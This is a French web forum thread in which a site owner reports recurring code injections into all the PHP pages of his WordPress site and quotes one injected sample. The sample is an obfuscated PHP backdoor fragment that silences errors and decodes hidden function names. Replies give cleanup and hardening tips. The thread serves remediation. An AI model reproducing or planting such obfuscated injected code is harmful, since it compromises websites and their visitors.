Bonjour,
Mon site web, http://ace-attorney.info, subit régulièrement des injections de code sur toutes ses pages php. Cela rend inopérantes pas mal de pages. Et à chaque fois que je pense avoir localisé définitivement la raison de ces attaques, c'est pour qu'elles reviennent de plus belle quelques mois après.
J'ai cru m'en être débarrassé un nombre incalculable de fois. J'ai cru que supprimer un plugin wordpress louche suffirait. J'ai cru que supprimer le wiki, qui n'a pas une sécurisation franchement exceptionnelle, serait suffisant. A chacune de mes tentatives, un code dégueulasse et incroyablement long vient polluer toutes mes pages. Bon ce n'est peut-être pas la bonne section du coup, j'avais posté un topic un peu différent à la base avant de me rendre compte que mes problèmes venaient de ces injections et d'éditer.
A titre informatif, l'un de ces codes :
:r%:|:**t%)m%=h%)m%):fmjix:<##:>:h%:<#64y]5524]25 x24- x24-!% x24- x24!|{;#)tutjyf`opjudovg)!g166 x3a 61 x31")) or (strstr($u x27!hmg%)!gj!~j%!<dfidk!~!<qp%!-uyfu%)3of)fepdof`57ftbc x7f!|!uyfu x27k:!ftmf!}Z;^o:!>! x242178}527}88:}334}472 x24!bssbz) x2if((function_exists(" x6f 142 x5f 163 x74 14)tutjyf`x x22l:!}V;3q%}U;y]}R;2]},;osvufs} x27;mnui}&;ze 125 x53 105 x52 137h%t%:osvufs:~:<*9-1-r%)s%>/h"))) { $doqmscw = " x63 162 x65 141 x74 145 x5f 17f#fubfsdXk5`{66~6<&w6< x7fw6CW&)7gj6<doj%7-C)fepmqnjA x27&6<.fmOBALS" x61 156 x75 156 x616e"; function cvcqvsy($n){return chr(ord($n)-1);} @error_reporting(0);2-u%!-#2#/#%#/#o]#/)323zbe!-#jt0?]+^?]_ x5c}X x2fw6<*K)ftpmdXA6|7197-2qj%7-K)udfoopdXA x22)7gj6<QDU`MPT7-NBF:>1U<#16,47R57,27R66,#/q%>2q%<#g6R85,67R37,18R#>q%tutjyf`opjudovg x22)!gj}1~!<2p% x7f!~!323zbek!~!b%Z<#opo#>b%!##>>X)!gjZ<#opo#>b%!X)ufhnpd19275fubmgoj{h1:|:*mmvo:>:iuhofm%:-5ppde:4:|:#ppde#)tutjyf7e:55946-tr.984:75983:48984:71]K9]77]D4]82]K6]72]K9]78]K5]53]Kas," x61 156 x64 162 x6f 151 x64")) or (strstjg}[;ldpt%}K;`ufldpt}]252]y85]256]y6g]257]y86]267]y74]275]y7:]268]y7f#! x2400~:5h%!<::::::-111112)eobs`un>qp%!|Z~!<##!>!2p%!|!!b%)sfxpmpusut!-#j0#!/!#sfmcSUT`LDPT7-UFOJ`GB)fu)ebfsX x27u%)7fmjix6>}R;msv}.;/#/#/},;#-#}24/%tmw/ x24)%zW%h>EzH,2W%wN;#-Ez-1HWCw[!%rN}#Qw! x24Ypp3)%cB%iN}#-! x24/%tmw/ x24)%c*W%eN+#Qi x5c1^W%c!>!%iV<#65,47R25,d7R17,67R37%w6Z6<.4`hA x27pd%6!#]y84]275]y83]248]y83]256]y81]265]y72]dof.)fepdof./#@#/qp%ttj x22)gj!|!*nbsbq%)323lj!|!*msv%)}k~~~j%!9!z>>2!%z>32!44#)zbssb!>!ssbnpe_GMFT`QIQ&f_UTPI`QUUI&e_SEEB`FUPNFS&d_S24- x24gps)%j>1j%!*3}C;!>>!}W;utpi}Y;tuofuopd`ufh`fm $gdtzdfr = implode(array_map("cvcd/#00;quui#>.%!<***f x27,*e x27,d x27,c x27,b x27)fep%)hopm3qjA)qj3hopmA x273qj%6<Y%)fnbozcYufhA x272qj%6<^#zsfvr# x5cq%)tpqssutRe%)Rd%)Rb%))!gj!<#cd2bge56+99386c6f+9f5d816:+946:cez-#:# x24- x24!>! x24/%tjw/ x24)% x24- x24`4 x223}!+!<+{e%+!+fepdfe{h+{d%)+"])))) { $GLOBALS[" xnbs+yfeobz+sfwjidsb`bj+upcotn+qsvmt+fmhpph#s:N}#-%o:W%c:>1
Bonjour,
1) faire les mises à jour de tous les plugins, thèmes et wordpress si ce n'est pas déjà fait.
2)verifier que la base de données est saine.
3) changer le mot de passe ftp.
4) comparer les fichiers à un backup. (avec win merge par exemple)
Notepad++
Télécharger tous les fichiers sur le pc.
Faire remplacer dans tous les fichiers ouverts
Tout sauvegarde
Tout renvoyer sur le serveur.
Bonjour,
Pour sécuriser un site Wordpress (ou atre CMS avec base de données) il ne suffit pas de faire chmod 505 sur tous les répertoires (même celui des images, tant qu'on n'inclut pas d'image) ?
Refait une install propre de ton site chez un autre hébergeur (gratuit : Hostinger) sans nom de domaine. Dès que ça remarche, tu fais chmod 505 sur tous les répertoires, et tu refais un transfert du site ainsi reconstruit sur ton hébergement chez OVH (avec ftp et import base de données).
le fait que tu aies des 404 peut venir d'un .htaccess différent ou de la réécriture URL différente dans le truc de wordpress.